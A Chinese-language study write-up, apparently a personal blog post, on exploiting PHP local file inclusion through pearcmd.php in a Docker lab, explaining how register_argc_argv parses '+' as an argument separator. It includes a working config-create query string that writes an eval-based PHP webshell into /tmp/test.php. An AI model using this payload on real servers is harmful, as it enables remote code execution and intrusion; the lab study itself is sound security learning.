利用pearcmd.php本地文件包含(LFI)
本文主要是为了学习如何用pearcmd进行本地文件包含
0x00 环境准备
首先先在docker中安装一个php环境。
docker exec -it [container id] /bin/bash进入docker命令行中
先启动php。docker run -p 80:80 php:****
再docker ps查看ID
进入html目录生成两个文件。
ps:我这么做发现没有vim编辑器.....编辑不了。然后更新源安装vim又失败。还要去改/etc/apt/sources.list.
但是没有vim编辑器又改不了。最后找到了一个方法。
将本机文件赋值到容器里面。
最后成功安装vim。
成功访问。
0x02 复现
在此之前我们需要确定几件事情:
1.我们要找到pearcmd.php的文件位置。正常情况下在/usr/local/lib/php/pearcmd.php
2.我们要开启register_argc_argv选项,当然了docker的PHP镜像是默认开启的。
当我们开启register_argc_argv选项的时候,$_SERVER[‘argv’]就会生效。
$_SERVER['argv'] #传递给该脚本的参数。也就是说在argv的情况下,pearcmd.php是通过$_SERVER[‘argv’]来获取参数的。
那么我们现在就要利用test2.php来看一下$_SERVER[‘argv’]是如何解析参数的。刚开始是0;
我们传入a=1&b=1。发现并不想之前&是作为分割符。“a=1&b=1”整体被当作字符串执行
然后“+”却被当作了分隔符。
总结一下。&和=都失去了它原先的功能。+变成了分割符号。
#!/bin/sh
# first find which PHP binary to use
if test "x$PHP_PEAR_PHP_BIN" != "x"; then
PHP="$PHP_PEAR_PHP_BIN"
else
if test "/usr/local/bin/php" = '@'php_bin'@'; then
PHP=php
else
PHP="/usr/local/bin/php"
fi
fi
# then look for the right pear include dir
if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then
INCDIR=$PHP_PEAR_INSTALL_DIR
INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR"
else
if test "/usr/local/lib/php" = '@'php_dir'@'; then
INCDIR=`dirname $0`
INCARG=""
else
INCDIR="/usr/local/lib/php"
INCARG="-d include_path=/usr/local/lib/php"
fi
fi
exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" $INCDIR/pearcmd.php "$@"
pear命令实质上就是调用了pearcmd.php,也就是说我们可以利用pear命令的形式来进行漏洞利用。
那么先让我们了解一下pear命令吧。
PEAR命令是一个PHP扩展包管理工具,它是通过在终端或命令行界面运行pear命令来调用的。PEAR命令本身并不是直接调用pearcmd.php文件,而是通过引用PEAR库和相关文件来执行各种操作。
(1)config-create
?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST['cmd']);?>+/tmp/test.php
加号表示分割。
(这里是向之前环境准备的test.php传参数)
检查docker中的/tmp/test.php。被写入了一句话木马。
(2)
后续没有完成,参考https://blog.csdn.net/Mrs_H/article/details/122386511
